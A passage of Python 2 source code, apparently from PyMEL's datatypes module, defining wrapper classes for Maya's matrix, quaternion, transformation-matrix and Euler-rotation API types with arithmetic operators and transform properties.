__metaclass__ = MetaMayaArrayTypeWrapper\n apicls = _api.MMatrix\n shape = (4, 4)\n cnames = ('a00', 'a01', 'a02', 'a03',\n 'a10', 'a11', 'a12', 'a13',\n 'a20', 'a21', 'a22', 'a23',\n 'a30', 'a31', 'a32', 'a33')\n\n # constants\n\n identity = _api.MMatrix()\n\n def __new__(cls, *args, **kwargs):\n shape = kwargs.get('shape', None)\n ndim = kwargs.get('ndim', None)\n size = kwargs.get('size', None)\n # will default to class constant shape = (4, 4), so it's just an error check to catch invalid shapes,\n # as no other option is actually possible on Matrix, but this method could be used to allow wrapping\n # of Maya array classes that can have a variable number of elements\n shape, ndim, size = cls._expandshape(shape, ndim, size)\n\n new = cls.apicls.__new__(cls)\n cls.apicls.__init__(new)\n return new\n\n def __init__(self, *args, **kwargs):\n \"\"\" __init__ method, valid for Vector, Point and Color classes \"\"\"\n cls = self.__class__\n\n if args:\n # allow both forms for arguments\n if len(args) == 1 and hasattr(args[0], '__iter__'):\n args = args[0]\n# shape = kwargs.get('shape', None)\n# ndim = kwargs.get('ndim', None)\n# size = kwargs.get('size', None)\n# if shape is not None or ndim is not None or size is not None :\n# shape, ndim, size = cls._expandshape(shape, ndim, size)\n# args = MatrixN(args, shape=shape, ndim=ndim, size=size)\n # shortcut when a direct api init is possible\n try:\n self.assign(args)\n except:\n super(MatrixN, self).__init__(*args)\n # value = list(Matrix(value, shape=self.shape).flat)\n # data = self.apicls()\n # _api.MScriptUtil.createMatrixFromList ( value, data )\n\n if hasattr(cls, 'cnames') and len(set(cls.cnames) & set(kwargs)):\n # can also use the form =\n l = list(self.flat)\n setcomp = False\n for i, c in enumerate(cls.cnames):\n if c in kwargs:\n if float(l[i]) != float(kwargs[c]):\n l[i] = float(kwargs[c])\n setcomp = True\n if setcomp:\n try:\n self.assign(l)\n except:\n msg = \", \".join(map(lambda x, y: x + \"=<\" + util.clsname(y) + \">\", cls.cnames, l))\n raise TypeError, \"in %s(%s), at least one of the components is of an invalid type, check help(%s) \" % (cls.__name__, msg, cls.__name__)\n\n # for compatibility with base classes Array that actually hold a nested list in their _data attribute\n # here, there is no _data attribute as we subclass _api.Vector directly, thus v.data is v\n # for wraps\n\n def _getdata(self):\n return self\n\n def _setdata(self, value):\n self.assign(value)\n\n def _deldata(self):\n if hasattr(self.apicls, 'clear'):\n self.apicls.clear(self)\n else:\n raise TypeError, \"cannot clear stored elements of %s\" % (self.__class__.__name__)\n\n data = property(_getdata, _setdata, _deldata, \"The Matrix/FloatMatrix/TransformationMatrix/Quaternion/EulerRotation data\")\n\n # set properties for easy acces to translation / rotation / scale of a Matrix or derived class\n # some of these will only yield dependable results if Matrix is a TransformationMatrix and some\n # will always be zero for some classes (ie only rotation has a value on a Quaternion\n\n def _getTranslate(self):\n t = TransformationMatrix(self)\n return Vector(t.getTranslation(_api.MSpace.kTransform))\n\n def _setTranslate(self, value):\n t = TransformationMatrix(self)\n t.setTranslation(Vector(value), _api.MSpace.kTransform)\n self.assign(t.asMatrix())\n translate = property(_getTranslate, _setTranslate, None, \"The translation expressed in this Matrix, in transform space\")\n\n def _getRotate(self):\n t = TransformationMatrix(self)\n return Quaternion(t.apicls.rotation(t))\n\n def _setRotate(self, value):\n t = TransformationMatrix(self)\n q = Quaternion(value)\n t.rotateTo(q)\n # values = (q.x, q.y, q.z, q.w)\n # t.setRotationQuaternion(q.x, q.y, q.z, q.w)\n self.assign(t.asMatrix())\n rotate = property(_getRotate, _setRotate, None, \"The rotation expressed in this Matrix, in transform space\")\n\n def _getScale(self):\n t = TransformationMatrix(self)\n return Vector(t.getScale(_api.MSpace.kTransform))\n\n def _setScale(self, value):\n t = TransformationMatrix(self)\n t.setScale(value, _api.MSpace.kTransform)\n self.assign(t.asMatrix())\n scale = property(_getScale, _setScale, None, \"The scale expressed in this Matrix, in transform space\")\n\n def __melobject__(self):\n \"\"\"Special method for returning a mel-friendly representation. In this case, a flat list of 16 values \"\"\"\n return [x for x in self.flat]\n\n # some Matrix derived classes can actually be represented as matrix but not stored\n # internally as such by the API\n\n def asMatrix(self, percent=None):\n \"The matrix representation for this Matrix/TransformationMatrix/Quaternion/EulerRotation instance\"\n if percent is not None and percent != 1.0:\n if type(self) is not TransformationMatrix:\n self = TransformationMatrix(self)\n return Matrix(self.apicls.asMatrix(self, percent))\n else:\n if type(self) is Matrix:\n return self\n else:\n return Matrix(self.apicls.asMatrix(self))\n\n matrix = property(asMatrix, None, None, \"The Matrix representation for this Matrix/TransformationMatrix/Quaternion/EulerRotation instance\")\n\n # overloads for assign and get though standard way should be to use the data property\n # to access stored values\n def assign(self, value):\n # don't accept instances as assign works on exact _api.Matrix type\n data = None\n if type(value) == self.apicls or type(value) == type(self):\n data = value\n elif hasattr(value, 'asMatrix'):\n data = value.asMatrix()\n else:\n value = list(MatrixN(value).flat)\n if len(value) == self.size:\n data = self.apicls()\n if isinstance(data, _api.MFloatMatrix):\n _api.MScriptUtil.createFloatMatrixFromList(value, data)\n elif isinstance(data, _api.MMatrix):\n _api.MScriptUtil.createMatrixFromList(value, data)\n else:\n tmp = _api.MMatrix()\n _api.MScriptUtil.createMatrixFromList(value, tmp)\n data = self.apicls(tmp)\n else:\n raise TypeError, \"cannot assign %s to a %s\" % (value, util.clsname(self))\n\n self.apicls.assign(self, data)\n return self\n\n # API get, actually not faster than pulling self[i] for such a short structure\n def get(self):\n \"\"\" Wrap the Matrix api get method \"\"\"\n mat = self.matrix\n return tuple(tuple(_api.MScriptUtil.getDoubleArrayItem(_api.MMatrix.__getitem__(mat, r), c) for c in xrange(Matrix.shape[1])) for r in xrange(Matrix.shape[0]))\n # ptr = _api.Matrix(self.matrix).matrix\n # return tuple(tuple(_api.MScriptUtil.getDouble2ArrayItem ( ptr, r, c) for c in xrange(Matrix.shape[1])) for r in xrange(Matrix.shape[0]))\n\n def __len__(self):\n \"\"\" Number of components in the Matrix instance \"\"\"\n return self.apicls.__len__(self)\n\n # iterator override\n # TODO : support for optionnal __iter__ arguments\n def __iter__(self, *args, **kwargs):\n \"\"\" Iterate on the Matrix rows \"\"\"\n return self.apicls.__iter__(self.data)\n # contains is herited from Array contains\n\n # __getitem__ / __setitem__ override\n def __getitem__(self, index):\n \"\"\" m.__getitem__(index) <==> m[index]\n Get component index value from self.\n index can be a single numeric value or slice, thus one or more rows will be returned,\n or a row,column tuple of numeric values / slices \"\"\"\n m = MatrixN(self)\n # print list(m)\n return m.__getitem__(index)\n # return super(MatrixN, self).__getitem__(index)\n\n # deprecated and __getitem__ should accept slices anyway\n def __getslice__(self, start, end):\n return self.__getitem__(slice(start, end))\n\n # as _api.Matrix has no __setitem__ method\n def __setitem__(self, index, value):\n \"\"\" m.__setitem__(index, value) <==> m[index] = value\n Set value of component index on self\n index can be a single numeric value or slice, thus one or more rows will be returned,\n or a row,column tuple of numeric values / slices \"\"\"\n m = MatrixN(self)\n m.__setitem__(index, value)\n self.assign(m)\n\n # deprecated and __setitem__ should accept slices anyway\n def __setslice__(self, start, end, value):\n self.__setitem__(slice(start, end), value)\n\n def __delitem__(self, index):\n \"\"\" Cannot delete from a class with a fixed shape \"\"\"\n raise TypeError, \"deleting %s from an instance of class %s will make it incompatible with class shape\" % (index, clsname(self))\n\n def __delslice__(self, start, end):\n self.__delitem__(slice(start, end))\n\n # TODO : wrap double Matrix:: operator() (unsigned int row, unsigned int col ) const\n\n # common operators herited from MatrixN\n\n # operators using the Maya API when applicable\n def __eq__(self, other):\n \"\"\" m.__eq__(v) <==> m == v\n Equivalence test \"\"\"\n try:\n return bool(self.apicls.__eq__(self, other))\n except:\n return bool(super(Matrix, self).__eq__(other))\n\n def __ne__(self, other):\n \"\"\" m.__ne__(v) <==> m != v\n Equivalence test \"\"\"\n return (not self.__eq__(other))\n\n def __neg__(self):\n \"\"\" m.__neg__() <==> -m\n The unary minus operator. Negates the value of each of the components of m \"\"\"\n return self.__class__(self.apicls.__neg__(self))\n\n def __add__(self, other):\n \"\"\" m.__add__(v) <==> m+v\n Returns the result of the addition of m and v if v is convertible to a MatrixN (element-wise addition),\n adds v to every component of m if v is a scalar \"\"\"\n try:\n return self.__class__._convert(self.apicls.__add__(self, other))\n except:\n return self.__class__._convert(super(Matrix, self).__add__(other))\n\n def __radd__(self, other):\n \"\"\" m.__radd__(v) <==> v+m\n Returns the result of the addition of m and v if v is convertible to a MatrixN (element-wise addition),\n adds v to every component of m if v is a scalar \"\"\"\n try:\n return self.__class__._convert(self.apicls.__radd__(self, other))\n except:\n return self.__class__._convert(super(Matrix, self).__radd__(other))\n\n def __iadd__(self, other):\n \"\"\" m.__iadd__(v) <==> m += v\n In place addition of m and v, see __add__ \"\"\"\n try:\n return self.__class__(self.__add__(other))\n except:\n return NotImplemented\n\n def __sub__(self, other):\n \"\"\" m.__sub__(v) <==> m-v\n Returns the result of the substraction of v from m if v is convertible to a MatrixN (element-wise substration),\n substract v to every component of m if v is a scalar \"\"\"\n try:\n return self.__class__._convert(self.apicls.__sub__(self, other))\n except:\n return self.__class__._convert(super(Matrix, self).__sub__(other))\n\n def __rsub__(self, other):\n \"\"\" m.__rsub__(v) <==> v-m\n Returns the result of the substraction of m from v if v is convertible to a MatrixN (element-wise substration),\n replace every component c of m by v-c if v is a scalar \"\"\"\n try:\n return self.__class__._convert(self.apicls.__rsub__(self, other))\n except:\n return self.__class__._convert(super(Matrix, self).__rsub__(other))\n\n def __isub__(self, other):\n \"\"\" m.__isub__(v) <==> m -= v\n In place substraction of m and v, see __sub__ \"\"\"\n try:\n return self.__class__(self.__sub__(other))\n except:\n return NotImplemented\n # action depends on second object type\n\n def __mul__(self, other):\n \"\"\" m.__mul__(x) <==> m*x\n If x is a MatrixN, __mul__ is mapped to matrix multiplication m*x, if x is a VectorN, to MatrixN by VectorN multiplication.\n Otherwise, returns the result of the element wise multiplication of m and x if x is convertible to Array,\n multiplies every component of b by x if x is a single numeric value \"\"\"\n try:\n return self.__class__._convert(self.apicls.__mul__(self, other))\n except:\n return self.__class__._convert(super(Matrix, self).__mul__(other))\n\n def __rmul__(self, other):\n \"\"\" m.__rmul__(x) <==> x*m\n If x is a MatrixN, __rmul__ is mapped to matrix multiplication x*m, if x is a VectorN (or Vector or Point or Color),\n to transformation, ie VectorN by MatrixN multiplication.\n Otherwise, returns the result of the element wise multiplication of m and x if x is convertible to Array,\n multiplies every component of m by x if x is a single numeric value \"\"\"\n try:\n return self.__class__._convert(self.apicls.__rmul__(self, other))\n except:\n return self.__class__._convert(super(Matrix, self).__rmul__(other))\n\n def __imul__(self, other):\n \"\"\" m.__imul__(n) <==> m *= n\n Valid for Matrix * Matrix multiplication, in place multiplication of MatrixN m by MatrixN n \"\"\"\n try:\n return self.__class__(self.__mul__(other))\n except:\n return NotImplemented\n # __xor__ will defer to Vector __xor__\n\n # API added methods\n\n def setToIdentity(self):\n \"\"\" m.setToIdentity() <==> m = a * b\n Sets MatrixN to the identity matrix \"\"\"\n try:\n self.apicls.setToIdentity(self)\n except:\n self.assign(self.__class__())\n return self\n\n def setToProduct(self, left, right):\n \"\"\" m.setToProduct(a, b) <==> m = a * b\n Sets MatrixN to the result of the product of MatrixN a and MatrixN b \"\"\"\n try:\n self.apicls.setToProduct(self.__class__(left), self.__class__(right))\n except:\n self.assign(self.__class__(self.__class__(left) * self.__class__(right)))\n return self\n\n def transpose(self):\n \"\"\" Returns the transposed Matrix \"\"\"\n try:\n return self.__class__._convert(self.apicls.transpose(self))\n except:\n return self.__class__._convert(super(Matrix, self).transpose())\n\n def inverse(self):\n \"\"\" Returns the inverse Matrix \"\"\"\n try:\n return self.__class__._convert(self.apicls.inverse(self))\n except:\n return self.__class__._convert(super(Matrix, self).inverse())\n\n def adjoint(self):\n \"\"\" Returns the adjoint (adjugate) Matrix \"\"\"\n try:\n return self.__class__._convert(self.apicls.adjoint(self))\n except:\n return self.__class__._convert(super(Matrix, self).adjugate())\n\n def homogenize(self):\n \"\"\" Returns a homogenized version of the Matrix \"\"\"\n try:\n return self.__class__._convert(self.apicls.homogenize(self))\n except:\n return self.__class__._convert(super(Matrix, self).homogenize())\n\n def det(self):\n \"\"\" Returns the determinant of this Matrix instance \"\"\"\n try:\n return self.apicls.det4x4(self)\n except:\n return super(Matrix, self).det()\n\n def det4x4(self):\n \"\"\" Returns the 4x4 determinant of this Matrix instance \"\"\"\n try:\n return self.apicls.det4x4(self)\n except:\n return super(Matrix, self[:4, :4]).det()\n\n def det3x3(self):\n \"\"\" Returns the determinant of the upper left 3x3 submatrix of this Matrix instance,\n it's the same as doing det(m[0:3, 0:3]) \"\"\"\n try:\n return self.apicls.det3x3(self)\n except:\n return super(Matrix, self[:3, :3]).det()\n\n def isEquivalent(self, other, tol=_api.MVector_kTol):\n \"\"\" Returns true if both arguments considered as Matrix are equal within the specified tolerance \"\"\"\n try:\n nself, nother = coerce(self, other)\n except:\n return False\n if isinstance(nself, Matrix):\n return bool(nself.apicls.isEquivalent(nself, nother, tol))\n else:\n return bool(super(MatrixN, nself).isEquivalent(nother, tol))\n\n def isSingular(self):\n \"\"\" Returns True if the given Matrix is singular \"\"\"\n try:\n return bool(self.apicls.isSingular(self))\n except:\n return super(MatrixN, self).isSingular()\n\n # additionnal methods\n\n def blend(self, other, weight=0.5):\n \"\"\" Returns a 0.0-1.0 scalar weight blend between self and other Matrix,\n blend mixes Matrix as transformation matrices \"\"\"\n if isinstance(other, Matrix):\n return self.__class__(self.weighted(1.0 - weight) * other.weighted(weight))\n else:\n return blend(self, other, weight=weight)\n\n def weighted(self, weight):\n \"\"\" Returns a 0.0-1.0 scalar weighted blend between identity and self \"\"\"\n if type(self) is not TransformationMatrix:\n self = TransformationMatrix(self)\n return self.__class__._convert(self.asMatrix(weight))\n\nclass FloatMatrix(Matrix):\n\n \"\"\" A 4x4 matrix class that wraps Maya's api FloatMatrix class,\n It behaves identically to Matrix, but it also derives from api's FloatMatrix\n to keep api methods happy\n \"\"\"\n apicls = _api.MFloatMatrix\n\nclass Quaternion(Matrix):\n apicls = _api.MQuaternion\n shape = (4,)\n cnames = ('x', 'y', 'z', 'w')\n\n def __new__(cls, *args, **kwargs):\n shape = kwargs.get('shape', None)\n ndim = kwargs.get('ndim', None)\n size = kwargs.get('size', None)\n # will default to class constant shape = (4,), so it's just an error check to catch invalid shapes,\n # as no other option is actually possible on Quaternion, but this method could be used to allow wrapping\n # of Maya array classes that can have a variable number of elements\n shape, ndim, size = cls._expandshape(shape, ndim, size)\n\n new = cls.apicls.__new__(cls)\n cls.apicls.__init__(new)\n return new\n\n def __init__(self, *args, **kwargs):\n \"\"\" __init__ method for Quaternion \"\"\"\n cls = self.__class__\n\n def isVectorLike(x):\n return isinstance(x, (_api.MVector, Vector)) \\\n or hasattr(x, '__len__') and len(x) == 3\n\n if args:\n # allow both forms for arguments\n if len(args) == 1 and hasattr(args[0], '__iter__') \\\n and not isinstance(args[0], (_api.MQuaternion, Quaternion)):\n args = args[0]\n\n rotate = getattr(args, 'rotate', None)\n # TransformationMatrix, Quaternion, EulerRotation api classes can convert to a rotation Quaternion\n if rotate is not None and not callable(rotate):\n args = args.rotate\n self.unit = 'radians'\n\n elif len(args) == 4 and isinstance(args[3], (basestring, util.EnumValue)): # isinstance(args[3], EulerRotation.RotationOrder) ) :\n quat = _api.MQuaternion()\n quat.assign(EulerRotation(*args, **kwargs))\n args = quat\n # allow to initialize directly from 3 rotations and a rotation order\n\n\n # axis-angle - want to authorize\n # Quaternion(Vector axis, float angle) as well as Quaternion(float angle, Vector axis)\n elif len(args) == 2 and isVectorLike(args[0]) and isinstance(args[1], (int, float)):\n args = (args[1], Vector(args[0]))\n elif len(args) == 2 and isinstance(args[0], (int, float)) and isVectorLike(args[1]):\n args = (args[0], Vector(args[1]))\n # rotate vector-to-vector\n elif len(args) == 2 and isVectorLike(args[0]) and isVectorLike(args[1]):\n args = (Vector(args[0]), Vector(args[1]))\n # rotate vector-to-vector, with scalar factor\n elif len(args) == 3 and isVectorLike(args[0]) and isVectorLike(args[1]) \\\n and isinstance(args[2], (int, float)):\n args = (Vector(args[0]), Vector(args[1]), args[2])\n\n # shortcut when a direct api init is possible\n try:\n self.assign(args)\n except:\n super(Array, self).__init__(*args)\n\n if hasattr(cls, 'cnames') and len(set(cls.cnames) & set(kwargs)):\n # can also use the form =\n l = list(self.flat)\n setcomp = False\n for i, c in enumerate(cls.cnames):\n if c in kwargs:\n if float(l[i]) != float(kwargs[c]):\n l[i] = float(kwargs[c])\n setcomp = True\n if setcomp:\n try:\n self.assign(l)\n except:\n msg = \", \".join(map(lambda x, y: x + \"=<\" + util.clsname(y) + \">\", cls.cnames, l))\n raise TypeError, \"in %s(%s), at least one of the components is of an invalid type, check help(%s) \" % (cls.__name__, msg, cls.__name__)\n\n # set properties for easy acces to translation / rotation / scale of a MMatrix or derived class\n # some of these will only yield dependable results if MMatrix is a MTransformationMatrix and some\n # will always be zero for some classes (ie only rotation has a value on a MQuaternion\n\n def _getTranslate(self):\n return Vector(0.0, 0.0, 0.0)\n translate = property(_getTranslate, None, None, \"The translation expressed in this MMQuaternion, which is always (0.0, 0.0, 0.0)\")\n\n def _getRotate(self):\n return self\n\n def _setRotate(self, value):\n self.assign(Quaternion(value))\n rotate = property(_getRotate, _setRotate, None, \"The rotation expressed in this Quaternion, in transform space\")\n\n def _getScale(self):\n return Vector(1.0, 1.0, 1.0)\n scale = property(_getScale, None, None, \"The scale expressed in this Quaternion, which is always (1.0, 1.0, 1.0)\")\n\n # overloads for assign and get though standard way should be to use the data property\n # to access stored values\n\n def assign(self, value):\n \"\"\" Wrap the Quaternion api assign method \"\"\"\n # api Quaternion assign accepts Matrix, Quaternion and EulerRotation\n if isinstance(value, Matrix):\n value = value.rotate\n else:\n if not hasattr(value, '__iter__'):\n value = (value,)\n value = self.apicls(*value)\n self.apicls.assign(self, value)\n return self\n\n # API get, actually not faster than pulling self[i] for such a short structure\n def get(self):\n \"\"\" Wrap the Quaternion api get method \"\"\"\n # need to keep a ref to the MScriptUtil alive until\n # all pointers aren't needed...\n ms = _api.MScriptUtil()\n l = (0,) * self.size\n ms.createFromDouble(*l)\n p = ms.asDoublePtr()\n self.apicls.get(self, p)\n return tuple([ms.getDoubleArrayItem(p, i) for i in xrange(self.size)])\n\n def __getitem__(self, i):\n return self._getitem(i)\n\n # faster to override __getitem__ cause we know Quaternion only has one dimension\n def _getitem(self, i):\n \"\"\" Get component i value from self \"\"\"\n if hasattr(i, '__iter__'):\n i = list(i)\n if len(i) == 1:\n i = i[0]\n else:\n raise IndexError, \"class %s instance %s has only %s dimension(s), index %s is out of bounds\" % (util.clsname(self), self, self.ndim, i)\n if isinstance(i, slice):\n try:\n return list(self)[i]\n except:\n raise IndexError, \"class %s instance %s is of size %s, index %s is out of bounds\" % (util.clsname(self), self, self.size, i)\n else:\n if i < 0:\n i = self.size + i\n if i < self.size and not i < 0:\n if hasattr(self.apicls, '__getitem__'):\n res = self.apicls.__getitem__(self, i)\n else:\n res = list(self)[i]\n return res\n else:\n raise IndexError, \"class %s instance %s is of size %s, index %s is out of bounds\" % (util.clsname(self), self, self.size, i)\n\n # as _api.Vector has no __setitem__ method, so need to reassign the whole Vector\n def __setitem__(self, i, a):\n \"\"\" Set component i value on self \"\"\"\n v = VectorN(self)\n v.__setitem__(i, a)\n self.assign(v)\n\n def __iter__(self):\n for i in range(self.size):\n yield self[i]\n\n def __len__(self):\n\n # api incorrectly returns 4. this might make sense if it did not simply return z a second time as the fourth element\n return self.size\n#\n# # TODO : support for optional __iter__ arguments\n# def __iter__(self, *args, **kwargs):\n# \"\"\" Iterate on the api components \"\"\"\n# return self.apicls.__iter__(self.data)\n\n def __contains__(self, value):\n \"\"\" True if at least one of the vector components is equal to the argument \"\"\"\n return value in self.__iter__()\n\nclass TransformationMatrix(Matrix):\n apicls = _api.MTransformationMatrix\n\n def _getTranslate(self):\n return Vector(self.getTranslation(_api.MSpace.kTransform))\n\n def _setTranslate(self, value):\n self.setTranslation(Vector(value), _api.MSpace.kTransform)\n translate = property(_getTranslate, _setTranslate, None, \"The translation expressed in this TransformationMatrix, in transform space\")\n\n def _getRotate(self):\n return Quaternion(self.apicls.rotation(self))\n\n def _setRotate(self, value):\n self.rotateTo(Quaternion(value))\n rotate = property(_getRotate, _setRotate, None, \"The quaternion rotation expressed in this TransformationMatrix, in transform space\")\n\n def rotateTo(self, value):\n '''Set to the given rotation (and result self)\n\n Value may be either a Quaternion, EulerRotation object, or a list of\n floats; if it is floats, if it has length 4 it is interpreted as\n a Quaternion; if 3, as a EulerRotation.\n '''\n if not isinstance(value, (Quaternion, EulerRotation,\n _api.MQuaternion, _api.MEulerRotation)):\n if len(value) == 3:\n value = EulerRotation(value)\n elif len(value) == 4:\n value = Quaternion(value)\n else:\n raise ValueError('arg to rotateTo must be a Quaternion, EulerRotation, or an iterable of 3 or 4 floats')\n return self.__class__(self.apicls.rotateTo(self, value))\n\n def eulerRotation(self):\n return EulerRotation(self.apicls.eulerRotation(self))\n\n def _getEuler(self):\n return self.eulerRotation()\n\n def _setEuler(self, value):\n self.rotateTo(EulerRotation(value))\n euler = property(_getEuler, _getEuler, None, \"The euler rotation expressed in this TransformationMatrix, in transform space\")\n\n # The apicls getRotation needs a \"RotationOrder &\" object, which is\n # impossible to make in python...\n # So instead, wrap eulerRotation\n def getRotation(self):\n return self.eulerRotation()\n\n def setRotation(self, *args):\n self.rotateTo(EulerRotation(*args))\n\n def _getScale(self):\n return Vector(self.getScale(_api.MSpace.kTransform))\n\n def _setScale(self, value):\n self.setScale(value, _api.MSpace.kTransform)\n scale = property(_getScale, _setScale, None, \"The scale expressed in this TransformationMatrix, in transform space\")\n\n\nclass EulerRotation(Array):\n\n \"\"\"\n unit handling:\n >>> from pymel.all import *\n >>> import pymel.core.datatypes as dt\n >>>\n >>> currentUnit(angle='degree')\n u'degree'\n >>> e = dt.EulerRotation([math.pi,0,0], unit='radians')\n >>> e\n dt.EulerRotation([3.14159265359, 0.0, 0.0], unit='radians')\n >>> e2 = dt.EulerRotation([180,0,0], unit='degrees')\n >>> e2\n dt.EulerRotation([180.0, 0.0, 0.0])\n >>> e.isEquivalent( e2 )\n True\n >>> e == e2\n True\n\n units are only displayed when they do not match the current ui unit\n >>> dt.Angle.getUIUnit() # check current angular unit\n 'degrees'\n >>> e\n dt.EulerRotation([3.14159265359, 0.0, 0.0], unit='radians')\n >>> dt.Angle.setUIUnit('radians') # change to radians\n >>> e\n dt.EulerRotation([3.14159265359, 0.0, 0.0])\n\n\n \"\"\"\n __metaclass__ = MetaMayaArrayTypeWrapper\n apicls = _api.MEulerRotation\n shape = (3,)\n cnames = ('x', 'y', 'z')\n\n RotationOrder = _factories.apiClassInfo['MEulerRotation']['pymelEnums']['RotationOrder']\n\n def _getorder(self):\n return self.RotationOrder[self.apicls.__dict__['order'].__get__(self, self.apicls)]\n\n def _setorder(self, val):\n self.apicls.__dict__['order'].__set__(self, self.RotationOrder.getIndex(val))\n order = property(_getorder, _setorder)\n\n def __new__(cls, *args, **kwargs):\n # shape = kwargs.get('shape', None)\n # ndim = kwargs.get('ndim', None)\n # size = kwargs.get('size', None)\n #\n new = cls.apicls.__new__(cls)\n cls.apicls.__init__(new)\n return new\n\n def __init__(self, *args, **kwargs):\n \"\"\" __init__ method for EulerRotation \"\"\"\n self.unit = None\n self.assign(*args, **kwargs)\n\n def setDisplayUnit(self, unit):\n if unit not in Angle.Unit:\n raise TypeError, \"%s is not a valid angular unit. See Angle.Unit for the list of valid units\"\n self.unit = unit\n\n def __repr__(self):\n argStrs = [str(self)]\n if self.unit != Angle.getUIUnit():\n argStrs.append('unit=%r' % self.unit)\n if self.order != 'XYZ':\n argStrs.append('order=%r' % str(self.order))\n return \"dt.%s(%s)\" % (self.__class__.__name__, ', '.join(argStrs))\n\n def __iter__(self):\n for i in range(self.size):\n yield self[i]\n\n def __getitem__(self, i):\n return Angle(self._getitem(i), 'radians').asUnit(self.unit)\n\n def __setitem__(self, key, val):\n kwargs = {}\n if key in self.cnames:\n kwargs[key] = val\n else:\n kwargs[self.cnames[key]] = val\n self.assign(**kwargs)\n\n # faster to override __getitem__ cause we know Vector only has one dimension\n def _getitem(self, i):\n \"\"\" Get component i value from self \"\"\"\n if hasattr(i, '__iter__'):\n i = list(i)\n if len(i) == 1:\n i = i[0]\n else:\n raise IndexError, \"class %s instance %s has only %s dimension(s), index %s is out of bounds\" % (util.clsname(self), self, self.ndim, i)\n if isinstance(i, slice):\n return _toCompOrArrayInstance(list(self)[i], VectorN)\n try:\n return _toCompOrArrayInstance(list(self)[i], VectorN)\n except:\n raise IndexError, \"class %s instance %s is of size %s, index %s is out of bounds\" % (util.clsname(self), self, self.size, i)\n else:\n if i < 0:\n i = self.size + i\n if i < self.size and not i < 0:\n if hasattr(self.apicls, '__getitem__'):\n return self.apicls.__getitem__(self, i)\n else:\n return list(self)[i]\n else:\n raise IndexError, \"class %s instance %s is of size %s, index %s is out of bounds\" % (util.clsname(self), self, self.size, i)\n\n def assign(self, *args, **kwargs):\n \"\"\" Wrap the Quaternion api assign method \"\"\"\n # After processing, we want to have args be in a format such that\n # we may do:\n # apicls.assign(*args)\n # This means that either:\n # args is a list/tuple of\n\n if 'unit' in kwargs:\n self.unit = kwargs['unit']\n elif self.unit is None:\n self.unit = Angle.getUIUnit()\n\n if len(args) == 1 and isinstance(args[0], _api.MTransformationMatrix):\n args = [args[0].asMatrix()]\n\n # api MEulerRotation assign accepts Matrix, Quaternion and EulerRotation\n validSingleObjs = (_api.MMatrix, _api.MQuaternion, _api.MEulerRotation)\n if len(args) == 1 and isinstance(args[0], validSingleObjs):\n self.unit = 'radians'\n self.apicls.assign(self, args[0])\n elif args:\n if len(args) == 1:\n args = list(args[0])\n elif len(args) == 2 and isinstance(args[1], (basestring, util.EnumValue)):\n args = list(args[0]) + [args[1]]\n else:\n # convert to list, as we may have to do modifications\n args = list(args)\n\n # If only 3 rotation angles supplied, and current order is\n # not default, make sure we maintain it\n if self.order != 'XYZ' and len(args) == 3:\n args.append(self.apicls.__dict__['order'].__get__(self, self.apicls))\n\n elif len(args) == 4 and isinstance(args[3], (basestring, util.EnumValue)):\n # allow to initialize directly from 3 rotations and a rotation order as string\n args[3] = self.RotationOrder.getIndex(args[3])\n\n # In case they do something like pass in a mix of Angle objects and\n # float numbers, convert to correct unit one-by-one...\n for i in xrange(3):\n if isinstance(args[i], Angle):\n args[i] = args[i].asUnit('radians')\n elif self.unit != 'radians' and not isinstance(args[i], Angle):\n args[i] = Angle(args[i], self.unit).asUnit('radians')\n self.apicls.setValue(self, *args)\n\n # We do kwargs as a separate step after args, instead of trying to combine\n # them, in case they do something like pass in a EulerRotation(myMatrix, y=2)\n if hasattr(self, 'cnames') and len(set(self.cnames) & set(kwargs)):\n # can also use the form =\n l = list(self.flat)\n setcomp = False\n for i, c in enumerate(self.cnames):\n if c in kwargs:\n if float(l[i]) != float(kwargs[c]):\n l[i] = float(kwargs[c])\n setcomp = True\n if setcomp:\n try:\n self.assign(l)\n except:\n msg = \", \".join(map(lambda x, y: x + \"=<\" + util.clsname(y) + \">\", cls.cnames, l))\n raise TypeError, \"in %s(%s), at least one of the components is of an invalid type, check help(%s) \" % (cls.__name__, msg, cls.__name__)\n\n return self\n\n # API get, actually not faster than pulling self[i] for such a short structure\n def get(self):\n \"\"\" Wrap the MEulerRotation api get method \"\"\"\n # need to keep a ref to the MScriptUtil alive until\n # all pointers aren't needed...\n ms = _api.MScriptUtil()\n l = (0,) * self.size\n ms.createFromDouble(*l)\n p = ms.asDoublePtr()\n self.apicls.get(self, p)\n return tuple([ms.getDoubleArrayItem(p, i) for i in xrange(self.size)])\n\n def __contains__(self, value):\n \"\"\" True if at least one of the vector components is equal to the argument \"\"\"\n return value in self.__iter__()\n\n def __len__(self):\n return self.apicls.__len__(self)\n\n # common operators without an api equivalent are herited from VectorN\n\n # operators using the Maya API when applicable, but that can delegate to VectorN\n\n def __eq__(self, other):\n \"\"\" u.__eq__(v) <==> u == v\n Equivalence test \"\"\"\n if isinstance(other, self.apicls):\n return bool(self.apicls.__eq__(self, other))\n else:\n return bool(super(EulerRotation, self).__eq__(other))\n\n def __ne__(self, other):\n \"\"\" u.__ne__(v) <==> u != v\n Equivalence test \"\"\"\n return (not self.__eq__(other))\n\n def __neg__(self):\n \"\"\" u.__neg__() <==> -u\n The unary minus operator. Negates the value of each of the components of u \"\"\"\n return self.__class__(self.apicls.__neg__(self))\n\n def __add__(self, other):\n \"\"\" u.__add__(v) <==> u+v\n Returns the result of the addition of u and v if v is convertible to a VectorN (element-wise addition),\n adds v to every component of u if v is a scalar \"\"\"\n try:\n return self.__class__._convert(self.apicls.__add__(self, other))\n except:\n return self.__class__._convert(super(EulerRotation, self).__add__(other))\n\n def __radd__(self, other):\n \"\"\" u.__radd__(v) <==> v+u\n Returns the result of the addition of u and v if v is convertible to a VectorN (element-wise addition),\n adds v to every component of u if v is a scalar \"\"\"\n try:\n return self.__class__._convert(self.apicls.__radd__(self, other))\n except:\n return self.__class__._convert(super(EulerRotation, self).__radd__(other))\n\n def __iadd__(self, other):\n \"\"\" u.__iadd__(v) <==> u += v\n In place addition of u and v, see __add__ \"\"\"\n try:\n return self.__class__(self.__add__(other))\n except:\n return NotImplemented\n\n def __sub__(self, other):\n \"\"\" u.__sub__(v) <==> u-v\n Returns the result of the substraction of v from u if v is convertible to a VectorN (element-wise substration),\n substract v to every component of u if v is a scalar \"\"\"\n try:\n return self.__class__._convert(self.apicls.__sub__(self, other))\n except:\n return self.__class__._convert(super(EulerRotation, self).__sub__(other))\n\n def __rsub__(self, other):\n \"\"\" u.__rsub__(v) <==> v-u\n Returns the result of the substraction of u 